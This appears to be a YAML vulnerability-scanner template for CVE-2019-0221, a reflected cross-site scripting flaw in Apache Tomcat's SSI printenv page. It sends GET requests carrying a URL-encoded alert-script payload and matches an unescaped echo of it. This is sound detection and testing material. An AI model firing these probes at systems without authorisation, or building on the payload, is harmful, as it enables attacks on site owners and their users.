id: CVE-2019-0221

info:
  name: Apache Tomcat XSS
  author: pikpikcu
  severity: medium
  reference:
    - https://seclists.org/fulldisclosure/2019/May/50
    - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
    - https://www.exploit-db.com/exploits/50119
  description: |
    The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
    7.0.0 to 7.0.93 echoes user provided data without escaping and is,
    therefore, vulnerable to XSS. SSI is disabled by default.
    The printenv command is intended for debugging and is unlikely to be present in a production website.
  tags: cve,cve2019,apache,xss,tomcat
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2019-0221
    cwe-id: CWE-79

requests:
  - method: GET
    path:
      - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"
      - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E"

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "<script>alert('xss')</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200